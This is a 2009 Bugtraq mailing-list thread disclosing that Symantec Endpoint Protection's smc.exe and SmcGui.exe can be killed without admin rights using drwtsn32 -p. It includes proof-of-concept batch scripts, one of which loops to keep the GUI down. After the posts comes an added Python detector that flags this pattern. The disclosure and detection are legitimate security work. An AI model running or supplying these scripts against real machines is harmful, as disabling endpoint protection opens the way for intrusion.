Date: Fri, 13 Feb 2009 20:06:24 +0530
From: "Sandeep Cheema" <51l3n7@...e.in>
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f

For the "users" it's working for SmcGUI.exe

Please find the code as below.

:here
tasklist | find /i "SmcGui.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
goto :here

I have tried it and when I let this file run for around 2 mins, the SmcGui.exe 
process loads up when you log off and log back in (or restart) but the icon 
does not show up in the taskbar.

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@...e.in>
Sent: Friday, February 13, 2009 7:03 PM
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f

> As an update, it's not happening for the "Users" account, though no access 
> denied.
>
> Does anyone know why?
>
> Thank you.
>
> Regards, Sandeep
>
> --------------------------------------------------
> From: "Sandeep Cheema" <51l3n7@...e.in>
> Sent: Friday, February 13, 2009 6:18 PM
> To: <bugtraq@...urityfocus.com>
> Subject: SEPKILL /im SMC.EXE /f
>
>> Hi,
>>
>> Probably this bug exists on majorly all the software, but security 
>> software like antivirus and firewall have to bucket it, which is not 
>> what it is for SEP.
>> I have tested it on all versions of SEP from 11.0.776 to 11.0.4000 (XP and 
>> 2k3)
>>
>>
>> You can kill smc.exe with the help of drwtsn32.exe in the following way.
>>
>> drwtsn32 -p %pid%
>> where pid is the process id for smc.exe
>>
>> POC:
>>
>> Save the following as a batch file and execute it
>>
>> tasklist | find /i "Smc.exe" > c:\pid.txt
>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>> drwtsn32 -p %pidopt%
>>
>>
>>
>> You don't need admin privilege for this exploit.
>>
>> This will even bypass the password if it has been set to stop the 
>> service.
>> If executed from the command line in the form drwtsn32 -p %pid% , the 
>> command will be executed and it takes some time for the process to be 
>> stopped.
>> If done from a batch file the command is completed only when the process 
>> is stopped.
>>
>> Regards, Sandeep
>> 51l3n7[at]live.in
>>
>>
>> 
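
A defender-side check for the behaviour described in this thread, as an added example that is not part of the original posts: it scans process-creation records for drwtsn32.exe started with -p against the PID of a running Smc.exe or SmcGui.exe. The record field names, sample events and paths are constructed for illustration, and treating a missing -e argument as a manual attach is an assumption.

```python
import re

PROTECTED = {"smc.exe", "smcgui.exe"}   # process names from the thread
PID_ARG = re.compile(r"(?:^|\s)-p\s+(\d+)", re.IGNORECASE)
EVENT_ARG = re.compile(r"(?:^|\s)-e\s+\d+", re.IGNORECASE)

def basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return alerts for drwtsn32 attached by PID to a protected process.

    events: process-creation records in time order; the keys image, pid,
    command_line and user are this example's own (hypothetical) schema.
    """
    live = {}     # pid -> protected process name seen starting
    alerts = []
    for ev in events:
        name = basename(ev["image"])
        if name in PROTECTED:
            live[ev["pid"]] = name
        elif name == "drwtsn32.exe":
            m = PID_ARG.search(ev["command_line"])
            if m and int(m.group(1)) in live:
                target = int(m.group(1))
                # Assumption: a crash-triggered launch also passes -e <event>,
                # so a bare "-p <pid>" is reported as a manual attach.
                manual = EVENT_ARG.search(ev["command_line"]) is None
                alerts.append({"user": ev["user"], "target": live[target],
                               "target_pid": target, "manual": manual})
    return alerts

# Constructed sample events (not real logs; paths are placeholders).
SAMPLE = [
    {"image": r"C:\example\Smc.exe", "pid": 1284, "user": "SYSTEM",
     "command_line": "Smc.exe"},
    {"image": r"C:\example\SmcGui.exe", "pid": 2040, "user": "alice",
     "command_line": "SmcGui.exe"},
    {"image": r"C:\example\notepad.exe", "pid": 3000, "user": "alice",
     "command_line": "notepad.exe"},
    {"image": r"C:\example\drwtsn32.exe", "pid": 3100, "user": "alice",
     "command_line": "drwtsn32 -p 3000 -e 152 -g"},
    {"image": r"C:\example\drwtsn32.exe", "pid": 3200, "user": "alice",
     "command_line": "drwtsn32 -p 2040"},
    {"image": r"C:\example\drwtsn32.exe", "pid": 3300, "user": "alice",
     "command_line": "drwtsn32 -p 1284"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

PID reuse is not handled here: a production rule would also consume process-termination events to expire entries in the live table.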
